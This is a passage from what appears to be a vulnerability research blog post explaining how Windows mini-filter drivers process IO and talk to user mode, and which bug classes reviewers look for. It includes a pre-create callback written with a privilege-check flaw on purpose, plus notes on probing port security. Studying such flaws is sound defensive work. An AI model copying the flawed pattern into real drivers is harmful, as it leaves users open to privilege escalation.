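        if (status != STATUS_REPARSE)
            return status;
        ++*restarts;
    }
    return STATUS_REPARSE;   /* gave up */
}
```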

Complete the IO request with a success result

The driver can immediately complete an IO request by returning FLT_PREOP_COMPLETE from a pre-operation callback and updating the IO_STATUS_BLOCK in the FLT_CALLBACK_DATA parameter. The previous reparse example shows how that update works. If you’re only updating the IO_STATUS_BLOCK you don’t need to mark the data as dirty.

Higher level filter drivers will still get their post-operation callbacks invoked if they’re registered for them, however no lower altitude drivers will be called with the IO request.

Complete the IO request with an error result

This is basically the same as for a success code, just specifying a different NT status. There’s nothing stopping a higher level filter driver from ignoring the error code and replacing it with a success.

Pass the IO request to a different file or device stack

The filter driver can redirect the operation to another device stack. For example you could implement a driver which redirects file reads and writes to a completely different file on the disk, making it look like the user is modifying the file when they’re not.

The most obvious way of achieving this would be to open the new file during the pre-create operation then use that file object as the target for all subsequent operations. There are two potential issues with this approach.

First, how can a filter driver interact with a file system volume it’s attached to without resulting in an infinite loop? For example, if the driver wants to open a file it can call IoCreateFile (and variants). However, the IO manager would dispatch the IO request to the top of the device stack, which would get back to the filter manager which could end up calling the filter driver again, ad infinitum. The same would be the case with any exported APIs from the kernel.

This issue is solved through two mechanisms. The first is that the filter manager exposes a set of APIs which mirror the kernel IO APIs but only dispatch the IO request to filters below the caller. For example, you can call FltCreateFileEx or FltWriteFile and be sure you won’t end up in a loop.

For file creation requests the driver can also employ a second mechanism called Extra Create Parameters (ECP). An ECP is a GUID along with additional data which can be attached to the create request using the FltInsertExtraCreateParameter API. The filter driver can attach the ECP to the request, then check for its presence using FltFindExtraCreateParameter API, allowing it to ignore the request. For example the earlier code which shows how LUAFV implements a reparse operation shows calling LuafvSetEcp which sets an ECP on the request so that the new create request can be ignored by the driver.
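
The ECP check amounts to tagging the requests the driver issues itself and skipping any request that carries that tag. The following models it with a hypothetical Guid type, a fixed-size ECP list and made-up GUID bytes. In a real driver the list lives on the create request and is accessed through FltInsertExtraCreateParameter and FltFindExtraCreateParameter.

```c
#include <assert.h>
#include <stdbool.h>
#include <string.h>

/* Hypothetical 16-byte GUID identifying this driver's ECP. */
typedef struct { unsigned char bytes[16]; } Guid;

static const Guid kMyEcpGuid = { { 0x11, 0x22, 0x33, 0x44, 0x55, 0x66, 0x77, 0x88,
                                   0x99, 0xaa, 0xbb, 0xcc, 0xdd, 0xee, 0xff, 0x00 } };

#define MAX_ECPS 4

/* Simplified create request carrying a small list of attached ECP GUIDs. */
typedef struct {
    Guid ecps[MAX_ECPS];
    int ecp_count;
} CreateRequest;

static bool insert_ecp(CreateRequest *req, const Guid *g) {
    if (req->ecp_count >= MAX_ECPS)
        return false;
    req->ecps[req->ecp_count++] = *g;
    return true;
}

static bool find_ecp(const CreateRequest *req, const Guid *g) {
    for (int i = 0; i < req->ecp_count; ++i)
        if (memcmp(&req->ecps[i], g, sizeof(*g)) == 0)
            return true;
    return false;
}

/* Pre-create logic: ignore creates the driver issued itself. */
static bool should_process(const CreateRequest *req) {
    return !find_ecp(req, &kMyEcpGuid);
}
```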

The second issue is how do you actually pass on the parameters for the IO request to the new file you’ve opened? The naive approach would be to extract the parameters then invoke the corresponding filter manager API. For example, for a write IO request, read out the buffer and length then call FltWriteFile. This is error prone and might introduce subtle security issues.

A better approach is the driver can change the TargetFileObject field in the pre-operation callback’s FLT_IO_PARAMETER_BLOCK structure then return a success code for the IO request to continue. This will cause the filter manager to send the original IO request to the new file object. The following is a simple example which could be in a pre-operation callback which will redirect the request to a file object extracted from the file system context:

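PREDIRECT_CONTEXT context = // Get driver’s allocated context.
if (context->FileObject) {
    Data->Iopb->TargetFileObject = context->FileObject;
    // Changing the target file object modifies the callback data.
    FltSetCallbackDataDirty(Data);
}
return FLT_PREOP_SUCCESS_NO_CALLBACK;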

Mini-Filter Communication

For there to be a security vulnerability the driver must process some untrustworthy data from a malicious user. What makes mini-filter drivers interesting is that there are multiple places where untrusted data can be processed. Let’s go through the ways of identifying and analyzing these communication channels.

Device Object

A mini-filter doesn’t need to create any device object to perform its function; the filter manager deals with creating any necessary device objects. That doesn’t mean the driver can’t create one for its own purposes. A typical attack vector is that a malicious user opens a handle to the device object and sends device IO control codes to exercise the vulnerable behavior.

I’m not going to go into details about how to analyze Windows kernel drivers for security issues in the IRP dispatch callbacks, as there’s plenty of other resources. For example: Reverse Engineering and Bug Hunting on KMDF Drivers (video, slides).

Filter Communication Ports

One unique communication mechanism which is implemented by the filter manager is Filter Communication Ports. A port can be created by a mini-filter driver by calling the exported filter manager API FltCreateCommunicationPort.

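PSECURITY_DESCRIPTOR SecurityDescriptor;
FltBuildDefaultSecurityDescriptor(&SecurityDescriptor, FLT_PORT_ALL_ACCESS);

UNICODE_STRING Name;
RtlInitUnicodeString(&Name, L"\\FilterPortName");

OBJECT_ATTRIBUTES ObjAttr;
InitializeObjectAttributes(&ObjAttr, &Name, OBJ_KERNEL_HANDLE | OBJ_CASE_INSENSITIVE,
                           NULL, SecurityDescriptor);

// FilterHandle is the PFLT_FILTER returned by FltRegisterFilter.
PFLT_PORT ServerPort;
NTSTATUS status = FltCreateCommunicationPort(FilterHandle,
                                             &ServerPort,
                                             &ObjAttr,
                                             NULL,
                                             CommConnectNotify,
                                             CommDisconnectNotify,
                                             CommMessageNotify,
                                             1);
FltFreeSecurityDescriptor(SecurityDescriptor);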

The name of the port is specified using an OBJECT_ATTRIBUTES structure, in this example the filter port will be called \FilterPortName in the Object Manager Namespace (OMNS). The driver should also specify the security descriptor to be associated with the port through the OBJECT_ATTRIBUTES. It’s most common to call the FltBuildDefaultSecurityDescriptor API to build a security descriptor which only grants administrators access to the port. However, the driver can configure the security any way it likes.

In FltCreateCommunicationPort the filter manager creates a new named kernel object of type FilterConnectionPort with the OBJECT_ATTRIBUTES and associates it with the callbacks. There’s no NtOpenFilterConnectionPort system call to open a port. Instead when a user wants to access the port it must first open a handle to the filter manager message device object, \FileSystem\Filters\FltMgrMsg, passing an extended attributes structure identifying the full OMNS path to the port.

It is much easier to open a port by calling the FilterConnectCommunicationPort API in user-mode, so you don’t need to deal with connecting manually. When opening a port you can also specify an arbitrary context buffer to pass to the connect callback. This can be used to configure the open port instance. On connection the connect notification callback passed to FltCreateCommunicationPort will be called. The prototype for the callback is as follows:

typedef NTSTATUS
(*PFLT_CONNECT_NOTIFY) (
      PFLT_PORT ClientPort,
      PVOID ServerPortCookie,
      PVOID ConnectionContext,
      ULONG SizeOfContext,
      PVOID *ConnectionPortCookie
);

The ConnectionContext and SizeOfContext are values passed from user-mode when calling FilterConnectCommunicationPort. The ConnectionContext has its length verified and copied into kernel memory before use. However, there’s no structure for the context so the driver must still carefully verify its contents before using it. The driver can reject a caller by returning an error NT status code. This allows the driver to do things like verify the caller is in a signed binary or similar, which is likely something security products will do.
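
As an illustration of that verification, here is a sketch of the checks a connect callback might apply to a context carrying a version and a variable-length name. The ConnectContext layout and validate_connect_context are hypothetical. The point is that every length inside the context has to be checked against SizeOfContext before it’s trusted.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical layout a driver might expect in the connection context.
   The filter manager only copies the bytes; it knows nothing about it. */
typedef struct {
    uint32_t Version;
    uint32_t NameLength;   /* length in bytes of Name that follows */
    char     Name[];       /* variable-length, not NUL-terminated */
} ConnectContext;

#define EXPECTED_VERSION 1u

/* Returns 0 on success, -1 if the caller-supplied context is malformed. */
static int validate_connect_context(const void *context, uint32_t size,
                                    char *out_name, size_t out_size) {
    const ConnectContext *c = context;
    if (context == NULL || size < offsetof(ConnectContext, Name))
        return -1;                      /* too small for the header */
    if (c->Version != EXPECTED_VERSION)
        return -1;
    if (c->NameLength > size - offsetof(ConnectContext, Name))
        return -1;                      /* claims more than was sent */
    if (c->NameLength >= out_size)
        return -1;                      /* won't fit in the local copy */
    memcpy(out_name, c->Name, c->NameLength);
    out_name[c->NameLength] = '\0';
    return 0;
}
```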

If the connection is allowed the ConnectionPortCookie pointer can be updated with a pointer to an allocated structure unique to the client. This pointer will be passed back to the driver in the message and disconnect notification callbacks.

You can enumerate what ports are currently registered by inspecting the OMNS. For example, to enumerate the ports in the root of the OMNS using my NtObjectManager PowerShell module run the following command:

PS> ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"

Name                                      TypeName
----                                      --------
storqosfltport                            FilterConnectionPort
MicrosoftMalwareProtectionRemoteIoPortWD  FilterConnectionPort
MicrosoftMalwareProtectionVeryLowIoPortWD FilterConnectionPort
WcifsPort                                 FilterConnectionPort
MicrosoftMalwareProtectionControlPortWD   FilterConnectionPort
BindFltPort                               FilterConnectionPort
MicrosoftMalwareProtectionAsyncPortWD     FilterConnectionPort
CLDMSGPORT                                FilterConnectionPort
MicrosoftMalwareProtectionPortWD          FilterConnectionPort

You might notice there is also a FilterCommunicationPort kernel object type. This is the object used for the client end, whereas FilterConnectionPort is the mini-filter’s server end. You should never see a FilterCommunicationPort named object in the OMNS.

When the port is opened the kernel will check the security descriptor for access. Unfortunately there’s no way to directly query the assigned security descriptor for a port from user-mode. The simplest way to test is to just try and open the port and see if it returns an access denied error.

PS> $ports = ls NtObject:\ | Where-Object TypeName -eq "FilterConnectionPort"
PS> foreach($port in $ports.Name) {
    Write-Host "\$port"
    Use-NtObject($p = Get-FilterConnectionPort "\$port") {}
}
\BindFltPort
Exception: "(0x80070005) - Access is denied."
\CLDMSGPORT
Exception: "(0x8007017C) - The cloud operation is invalid."

We can see two ports output in the previous code snippet. The BindFltPort port fails with an access denied error, while the CLDMSGPORT port (which is part of the Cloud Filter driver) returns “The cloud operation is invalid.”. The second error indicates that we’ve likely opened the port, but you’ll need to supply specific parameters in the context buffer when calling the FilterConnectCommunicationPort API. You can specify the connection context for the Get-FilterConnectionPort command by specifying a byte array to the Context parameter.

PS> $port = Get-FilterConnectionPort -Path "\PORT" -Context @(0, 1, 2, 3)

You can inspect the security descriptor for a port if you’ve got a Windows system with a kernel debugger enabled and a copy of WinDBG.

0: kd> !object \CLDMSGPORT
Object: ffffb487447ff8c0  Type: (ffffb4873d67dc40) FilterConnectionPort
    ObjectHeader: ffffb487447ff890 (new version)
    HandleCount: 1  PointerCount: 4
    Directory Object: ffff8a8889a2d4e0  Name: CLDMSGPORT
0: kd> dx (((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7)
(((nt!_OBJECT_HEADER*)0xffffb487447ff890)->SecurityDescriptor & ~0x7) : 0xffff8a888dccb0a0
0: kd> !sd 0xffff8a888dccb0a0 1
->Revision: 0x1
->Sbz1    : 0x0
->Control : 0x9004
->Owner   : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group   : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl    :
->Dacl    : ->AclRevision: 0x2
->Dacl    : ->Sbz1       : 0x0
->Dacl    : ->AclSize    : 0x1c
->Dacl    : ->AceCount   : 0x1
->Dacl    : ->Sbz2       : 0x0
->Dacl    : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl    : ->Ace[0]: ->AceFlags: 0x0
->Dacl    : ->Ace[0]: ->AceSize: 0x14
->Dacl    : ->Ace[0]: ->Mask : 0x001f0001
->Dacl    : ->Ace[0]: ->SID: S-1-5-11 (Well Known Group: NT AUTHORITY\Authenticated Users)
->Sacl    :  is NULL

To dump the SD you first query for the object address of the filter connection port using the !object command. From the output you take the address of the OBJECT_HEADER structure and query its SecurityDescriptor field. Note you must clear the lower 3 bits of the field’s value to get a valid security descriptor pointer. Finally we can print the security descriptor using the !sd command. The output shows that the security descriptor grants the Authenticated Users group access to connect to the port.
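
The numbers in the debugger output can be checked by hand. In the sketch below the flag and access-right values are the standard SDK constants (FLT_PORT_CONNECT is 0x0001 and FLT_PORT_ALL_ACCESS combines it with STANDARD_RIGHTS_ALL), and sd_pointer is a hypothetical helper doing the same masking as the dx command. It shows that the Control value 0x9004 is SE_DACL_PRESENT, SE_DACL_PROTECTED and SE_SELF_RELATIVE, and that the ACE mask 0x001f0001 is FLT_PORT_ALL_ACCESS, i.e. Authenticated Users get full access to the port rather than only the connect right.

```c
#include <assert.h>
#include <stdint.h>

/* Standard constant values from the Windows SDK headers. */
#define SE_DACL_PRESENT     0x0004u
#define SE_DACL_PROTECTED   0x1000u
#define SE_SELF_RELATIVE    0x8000u
#define STANDARD_RIGHTS_ALL 0x001F0000u
#define FLT_PORT_CONNECT    0x0001u
#define FLT_PORT_ALL_ACCESS (FLT_PORT_CONNECT | STANDARD_RIGHTS_ALL)

/* The low 3 bits of OBJECT_HEADER.SecurityDescriptor are not part of the
   address, so they must be cleared to get a usable pointer. */
static uint64_t sd_pointer(uint64_t header_field) {
    return header_field & ~(uint64_t)0x7;
}
```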

With an open handle to the port you can now send and receive messages. The filter manager supports both user to kernel and kernel to user message directions. For the user to kernel messages you call the FilterSendMessage API which sends a raw memory buffer to the filter driver and returns a separate buffer as shown in the following prototype:

HRESULT FilterSendMessage(
  HANDLE  hPort,
  LPVOID  lpInBuffer,
  DWORD   dwInBufferSize,
  LPVOID  lpOutBuffer,
  DWORD   dwOutBufferSize,
  LPDWORD lpBytesReturned
);

The message is delivered to the filter driver’s message notification callback specified when registering the mini-filter. The callback has the following prototype.

typedef NTSTATUS
(*PFLT_MESSAGE_NOTIFY) (
      IN PVOID PortCookie,
      IN PVOID InputBuffer OPTIONAL,
      IN ULONG InputBufferLength,
      OUT PVOID OutputBuffer OPTIONAL,
      IN ULONG OutputBufferLength,
      OUT PULONG ReturnOutputBufferLength
);

The handling of the message is similar to a device IO control call. In fact, under the hood it’s implemented using the device IO control code 0x8801B. As this code uses the METHOD_NEITHER method, the InputBuffer and OutputBuffer parameters are pointers into user-mode memory. The filter manager does check them with ProbeForRead and ProbeForWrite before calling the callback.
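
The claim that 0x8801B uses METHOD_NEITHER can be confirmed by splitting the code into the fields the CTL_CODE macro packs together. The decoder below is a hypothetical helper. Decoding 0x8801B gives device type 0x8 (FILE_DEVICE_DISK_FILE_SYSTEM), access 2 (FILE_WRITE_ACCESS), function 6 and method 3 (METHOD_NEITHER).

```c
#include <assert.h>
#include <stdint.h>

/* Field layout of a Windows device/file system control code, as built by
   CTL_CODE: DeviceType << 16 | Access << 14 | Function << 2 | Method */
typedef struct {
    uint32_t device_type, access, function, method;
} CtlCode;

#define METHOD_BUFFERED 0u
#define METHOD_NEITHER  3u

static CtlCode decode_ctl_code(uint32_t code) {
    CtlCode c;
    c.device_type = code >> 16;
    c.access      = (code >> 14) & 0x3;
    c.function    = (code >> 2) & 0xFFF;
    c.method      = code & 0x3;
    return c;
}
```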

You can send a message to a filter connection port in PowerShell using the Send-FilterConnectionPort command specifying the data to send and the maximum size of the output buffer.

PS> Send-FilterConnectionPort -Port $port -Input @(0, 1, 2, 3) -MaximumOutput 0x100

For the kernel to user messages the user mode application needs to call FilterGetMessage to wait for the filter driver to send a message to user-mode. The kernel sends a message to the waiting user mode application using the FltSendMessage API which has the following prototype.

NTSTATUS FltSendMessage(
  PFLT_FILTER    Filter,
  PFLT_PORT      *ClientPort,
  PVOID          SenderBuffer,
  ULONG          SenderBufferLength,
  PVOID          ReplyBuffer,
  PULONG         ReplyLength,
  PLARGE_INTEGER Timeout
);

If there’s currently no waiting user-mode process, the API can wait for a specified timeout until the application calls FilterGetMessage. The returned buffer from FilterGetMessage contains a FILTER_MESSAGE_HEADER structure followed by the data. The header contains the size of the reply requested as well as a message ID which is used to correlate any reply to the kernel’s message.

To reply the user-mode application calls the FilterReplyMessage API. The user-mode application needs to append any data to a FILTER_REPLY_HEADER structure which contains the NT status code of the operation and the correlated message ID. The FltSendMessage API waits for the user-mode application to call FilterReplyMessage with the correct ID, and returns a buffer to the kernel-mode code. The message notification callback is not involved when using kernel to user-mode calls.
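
The message ID is what ties a reply back to the kernel’s request. The following sketch models that bookkeeping. The header structs mirror the field names of FILTER_MESSAGE_HEADER and FILTER_REPLY_HEADER, while PendingTable, send_message and deliver_reply are hypothetical and don’t reflect how the filter manager actually stores pending messages.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Simplified mirrors of FILTER_MESSAGE_HEADER / FILTER_REPLY_HEADER. */
typedef struct {
    uint32_t ReplyLength;
    uint64_t MessageId;
} MessageHeader;

typedef struct {
    int32_t  Status;
    uint64_t MessageId;
} ReplyHeader;

#define MAX_PENDING 8

/* Hypothetical kernel-side table of messages awaiting a reply. */
typedef struct {
    uint64_t ids[MAX_PENDING];
    size_t count;
    uint64_t next_id;
} PendingTable;

static MessageHeader send_message(PendingTable *t, uint32_t reply_length) {
    MessageHeader h = { reply_length, ++t->next_id };
    assert(t->count < MAX_PENDING);
    t->ids[t->count++] = h.MessageId;
    return h;
}

/* Accepts a reply only if its MessageId matches an outstanding message,
   then removes that message. Returns 1 if matched, 0 otherwise. */
static int deliver_reply(PendingTable *t, const ReplyHeader *r) {
    for (size_t i = 0; i < t->count; ++i) {
        if (t->ids[i] == r->MessageId) {
            t->ids[i] = t->ids[--t->count];
            return 1;
        }
    }
    return 0;
}
```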

Filter Callbacks

Typically the purpose of the mini-filter callbacks would be to inspect or modify pre-existing IO requests to a file system. Therefore one way of getting untrusted data to the driver is based on how it handles IO requests. However, it’s possible to add additional functionality on top of an existing file system to allow for communication between user mode and kernel mode. The filter driver can add a callback for device or file system IO control code requests and check and handle its own control codes. This allows the filter to implement additional functionality on existing files.

The following is a simple example of adding a FSCTL_REVERSE_BYTES FS IO control code to an existing file system. This FSCTL is made up for the example and isn’t supported by any real file system.

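// Made-up control code for this example; the function number is arbitrary.
#define FSCTL_REVERSE_BYTES CTL_CODE(FILE_DEVICE_FILE_SYSTEM, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)

const FLT_OPERATION_REGISTRATION Callbacks[] = {
    { IRP_MJ_FILE_SYSTEM_CONTROL,
      0,
      PreFileSystemControlOperation,
      NULL },
    { IRP_MJ_OPERATION_END }
};

FLT_PREOP_CALLBACK_STATUS
PreFileSystemControlOperation(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    PFLT_PARAMETERS ps = &Data->Iopb->Parameters;
    if (ps->FileSystemControl.Common.FsControlCode != FSCTL_REVERSE_BYTES) {
        return FLT_PREOP_SUCCESS_NO_CALLBACK;
    }
    char* buffer = ps->FileSystemControl.Buffered.SystemBuffer;
    ULONG length = min(ps->FileSystemControl.Buffered.InputBufferLength,
                       ps->FileSystemControl.Buffered.OutputBufferLength);
    // Swap bytes from both ends, stopping at the midpoint.
    for (ULONG i = 0; i < length / 2; ++i)
    {
        char tmp = buffer[i];
        buffer[i] = buffer[length - i - 1];
        buffer[length - i - 1] = tmp;
    }
    Data->IoStatus.Status = STATUS_SUCCESS;
    Data->IoStatus.Information = length;
    // Complete here so the file system never sees the unknown FSCTL.
    return FLT_PREOP_COMPLETE;
}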

The parameters for the FSCTL or IOCTL are separated based on the method of buffer access. In this case the FSCTL uses METHOD_BUFFERED so the parameters are accessed through the Buffered field. The filter driver needs to ensure it correctly handles all buffer types if it wants to implement its own control codes.
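
The core of the handler can be exercised outside the kernel. This portable sketch (reverse_system_buffer is a hypothetical name) mirrors the METHOD_BUFFERED case: the IO manager supplies one SystemBuffer for both directions, only the first InputBufferLength bytes hold caller data, and at most OutputBufferLength bytes are copied back, so the minimum of the two is the safe working length. Note the loop stops at length / 2; running it over the full length would swap every pair twice and leave the buffer unchanged.

```c
#include <assert.h>
#include <stddef.h>
#include <string.h>

/* Reverses the first min(input_length, output_length) bytes in place and
   returns that length, which the handler reports as IoStatus.Information. */
static size_t reverse_system_buffer(char *system_buffer,
                                    size_t input_length,
                                    size_t output_length) {
    size_t length = input_length < output_length ? input_length : output_length;
    for (size_t i = 0; i < length / 2; ++i) {
        char tmp = system_buffer[i];
        system_buffer[i] = system_buffer[length - i - 1];
        system_buffer[length - i - 1] = tmp;
    }
    return length;
}
```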

This technique is used by the Windows Overlay Filter (WOF). For example, the FSCTL code FSCTL_SET_EXTERNAL_BACKING is not supported by NTFS. Instead it’s intercepted by a pre-operation callback in the WOF filter which completes it before it reaches the NTFS driver. The NTFS driver never sees the control code, unless the WOF driver happens to not be enabled.

Reparse Points

Reparse point buffers are most commonly known for implementing symbolic link support for NTFS. However the reparse point feature of NTFS can store arbitrary tagged data which is used by filter drivers to store additional offline state information for a file. For example, WOF uses its own reparse buffer, with the tag IO_REPARSE_TAG_WOF to store the location of the real file or status of a compressed file.

A user-mode application would set, query and delete reparse points using FSCTL control codes, such as FSCTL_SET_REPARSE_POINT. The recommended way for a mini-filter driver to set and delete a file’s reparse buffer is through the FltTagFile (and FltTagFileEx) and FltUntagFile APIs. Searching for the driver’s imported APIs should quickly show whether the driver uses its own reparse buffer format.

To open a file with a supported reparse point buffer, the driver could register for the post-create callback and wait for any request which returns the STATUS_REPARSE NT status, then query the reparse point data from the TagData field in the FLT_CALLBACK_DATA parameter. If the reparse tag matches one the filter driver supports, it can re-issue the create request but specify the FILE_OPEN_REPARSE_POINT flag to open the file and ignore the reparse point. There are many problems with this, not least that it requires two IO requests for a single creation and the driver would have to process every reparse event.

To simplify this, Windows 10 supports the ECP_TYPE_OPEN_REPARSE_GUID ECP. You add the ECP with a buffer containing an OPEN_REPARSE_LIST_ENTRY structure which defines the reparse tag the driver handles. When NTFS encounters a reparse point buffer, it checks whether its tag is in the open reparse list. If so, instead of returning STATUS_REPARSE, NTFS sets the OPEN_REPARSE_POINT_TAG_ENCOUNTERED flag in the OPEN_REPARSE_LIST_ENTRY structure, opens the file and returns a success status code. The filter driver can then check for the flag in the post-create callback; if it is set, the driver can query the reparse tag from the file, for example using FSCTL_GET_REPARSE_POINT, and handle it accordingly.
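The decision NTFS makes here can be modelled in a few lines. The sketch below is a simplified, hypothetical stand-in: struct open_reparse_entry is not the real OPEN_REPARSE_LIST_ENTRY layout, and TAG_ENCOUNTERED is a placeholder whose value may differ from OPEN_REPARSE_POINT_TAG_ENCOUNTERED. Only the status codes and reparse tag values are taken from the Windows headers.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define STATUS_SUCCESS         0x00000000u
#define STATUS_REPARSE         0x00000104u
#define IO_REPARSE_TAG_WOF     0x80000017u
#define IO_REPARSE_TAG_SYMLINK 0xA000000Cu

/* Placeholder for OPEN_REPARSE_POINT_TAG_ENCOUNTERED; real value may differ. */
#define TAG_ENCOUNTERED 0x1u

/* Hypothetical, simplified stand-in for OPEN_REPARSE_LIST_ENTRY. */
struct open_reparse_entry {
    uint32_t reparse_tag;
    uint32_t flags;
};

/* Models the file system's choice when a create hits a reparse point. */
static uint32_t open_with_reparse_list(uint32_t file_tag,
                                       struct open_reparse_entry *list,
                                       size_t count) {
    assert(list != NULL || count == 0);
    for (size_t i = 0; i < count; ++i) {
        if (list[i].reparse_tag == file_tag) {
            list[i].flags |= TAG_ENCOUNTERED; /* checked in post-create */
            return STATUS_SUCCESS;            /* file opened, no reparse */
        }
    }
    return STATUS_REPARSE; /* tag not in the list: normal reparse handling */
}
```

The point of the design is that one create request serves both cases, instead of the filter catching STATUS_REPARSE and re-issuing the create.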

The filter manager also exposes the FltAddOpenReparseEntry and FltRemoveOpenReparseEntry APIs to simplify adding and removing these open reparse list entries. Searching for use of these APIs should give you an idea of whether the filter driver implements its own reparse point format.

The reason I mention this in the context of communication is that a filter driver will process these reparse buffers when accessing the file system. The NTFS driver only checks for SeCreateSymbolicLinkPrivilege if a user is writing the IO_REPARSE_TAG_SYMLINK tag. NTFS delegates verification of the REPARSE_DATA_BUFFER structure which will be written to the file system to the kernel API FsRtlValidateReparsePointBuffer. That API only does basic length checks for non-symlink tag types, so the arbitrary bytes in the DataBuffer field must be treated as completely untrusted, which can lead to security issues during parsing.
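Because only the outer lengths are validated, every length inside DataBuffer has to be re-checked by the filter. Here is a minimal portable sketch, assuming a hypothetical filter-private payload of the form [u16 name_len][name bytes] and a hypothetical tag value 0x8000BEEF. The 8-byte header mirrors the ReparseTag, ReparseDataLength and Reserved fields of REPARSE_DATA_BUFFER.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define REPARSE_HEADER_SIZE 8u /* ReparseTag(4) + ReparseDataLength(2) + Reserved(2) */
#define IO_REPARSE_TAG_EXAMPLE 0x8000BEEFu /* hypothetical tag for this sketch */

static uint16_t read_le16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t read_le32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Parses the hypothetical payload. Returns 0 on success, -1 if any length
   is inconsistent with the bytes actually available. */
static int parse_private_reparse(const uint8_t *buf, size_t buf_len,
                                 const uint8_t **name, uint16_t *name_len) {
    assert(buf != NULL && name != NULL && name_len != NULL);
    if (buf_len < REPARSE_HEADER_SIZE) return -1;
    if (read_le32(buf) != IO_REPARSE_TAG_EXAMPLE) return -1;
    uint16_t data_len = read_le16(buf + 4);
    /* The header length must fit inside the buffer we were given. */
    if (data_len > buf_len - REPARSE_HEADER_SIZE) return -1;
    const uint8_t *data = buf + REPARSE_HEADER_SIZE;
    if (data_len < 2) return -1;
    uint16_t n = read_le16(data);
    /* The inner length is attacker-controlled too: bound it by data_len. */
    if (n > data_len - 2) return -1;
    *name = data + 2;
    *name_len = n;
    return 0;
}
```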

Security Bug Classes

I’ve now provided examples of how a mini-filter operates and how you can communicate with it. Let’s finish up with an overview of potential bug classes to look for when doing a review. Some of these bug classes are common to any kernel driver, but others are very specifically due to the way mini-filters operate.

Where possible I’ll also provide an example of a vulnerability I’ve discovered to improve understanding. Note that this is not an exhaustive list; I’m sure there are some novel bug classes I don’t know about which are missing from it. That’s why it’s good to describe this process in more detail, so others can take advantage of my knowledge and find new and interesting issues.

To aid in analysis I’ve uploaded the header file I use in IDA Pro to populate the filter manager types. You can get it from GitHub. I’ve tried to ensure it’s correct and up to date, but there’s a chance that it is not. YMMV.

Common-or-Garden Variety Memory Safety Hazards

As mini-filters are native C code, you can expect the same sorts of issues you’d find in any sizable code base, including integer wrapping and incorrect reference counting leading to memory safety hazards. Any of the described communication methods could result in untrusted data being processed and mishandled. I don’t think I need to describe this in any detail.

Ignoring the RequestorMode Value

All filtered IO requests have an assigned RequestorMode parameter in the FLT_CALLBACK_DATA structure which indicates whether it originated from user or kernel mode code. If an IO request is dispatched from kernel mode code the IO manager and file system drivers typically disable security checks, such as file access checking.

There are a couple of related bug classes you’ll see with regards to RequestorMode. The first class is the filter driver ignoring its value. This can be a problem if the filter driver redirects the IO request to another file either directly or by using a reparse operation during file creation.

For example, CVE-2018-0877 was an issue I found in the WCIFS driver which provides file system virtualization for Desktop Bridge applications. The root cause was the driver would reparse to a user controllable location if the requested file didn’t exist in privileged Windows directories.

It’s common to find kernel code opening files inside privileged directories with RequestorMode set to kernel mode. The kernel code can assume these files can’t be tampered with, as only an administrator can normally modify those directories. The end result was that a normal user application could get a file opened in the user-controllable location but with access checking disabled. In the proof-of-concept in the issue tracker I exploit this to redirect a request for a National Language Support (NLS) file to read arbitrary files on disk, such as the SAM hive. The technique was described separately in this blog post.

Incorrect RequestorMode Check

The second bug class in checking the RequestorMode can occur during a file create operation. Specifically the RequestorMode field is checked but the driver does not verify if access checking has been re-enabled through the IO_FORCE_ACCESS_CHECK flag passed to IoCreateFile and variants. For a bit more context on this bug class refer to my blog post from last year where I collaborated with Microsoft on related issues.
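// Example pre-create callback; the function name is illustrative.
FLT_PREOP_CALLBACK_STATUS
ExamplePreCreateCallback(
    PFLT_CALLBACK_DATA Data,
    PCFLT_RELATED_OBJECTS FltObjects,
    PVOID* CompletionContext
) {
    UNREFERENCED_PARAMETER(FltObjects);
    UNREFERENCED_PARAMETER(CompletionContext);
    // Vulnerable: RequestorMode is trusted even when SL_FORCE_ACCESS_CHECK
    // is set in Data->Iopb->OperationFlags.
    if (!SeSinglePrivilegeCheck(SeExports->SeTcbPrivilege, 
                                Data->RequestorMode)) {
        Data->IoStatus.Status = STATUS_ACCESS_DENIED;
        return FLT_PREOP_COMPLETE;
    }

    // Perform some privileged action.

    return FLT_PREOP_SUCCESS_NO_CALLBACK;
}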

The example above shows misuse of the RequestorMode field. It passes the field directly to SeSinglePrivilegeCheck; if it indicates the call came from the kernel, the privilege check always returns TRUE, meaning the privileged action will be taken. As the linked blog post describes, this can happen if the file is opened by calling IoCreateFileEx or similar APIs with incorrect flags.

To guard against this issue the driver needs to check if the SL_FORCE_ACCESS_CHECK flag has been set in the OperationFlags field of the FLT_IO_PARAMETER_BLOCK structure. If that flag is set the value of RequestorMode should always be assumed to be from user mode.
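The guard can be expressed as a small helper that computes the mode to use for security decisions. This is a portable sketch: the enum mirrors the kernel's KernelMode (0) and UserMode (1) values, SL_FORCE_ACCESS_CHECK is re-declared with its value from wdm.h (0x01), and privilege_check is a hypothetical stand-in for SeSinglePrivilegeCheck's short-circuit on kernel-mode callers.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

/* Mirrors KPROCESSOR_MODE values: KernelMode = 0, UserMode = 1. */
enum processor_mode { KERNEL_MODE = 0, USER_MODE = 1 };
#define SL_FORCE_ACCESS_CHECK 0x01u

/* requestor_mode models Data->RequestorMode; operation_flags models
   Data->Iopb->OperationFlags. */
static enum processor_mode effective_mode(enum processor_mode requestor_mode,
                                          uint8_t operation_flags) {
    assert(requestor_mode == KERNEL_MODE || requestor_mode == USER_MODE);
    if (operation_flags & SL_FORCE_ACCESS_CHECK)
        return USER_MODE; /* caller asked for access checks: treat as user */
    return requestor_mode;
}

/* Toy privilege check: kernel-mode callers always pass. */
static bool privilege_check(bool caller_has_privilege, enum processor_mode mode) {
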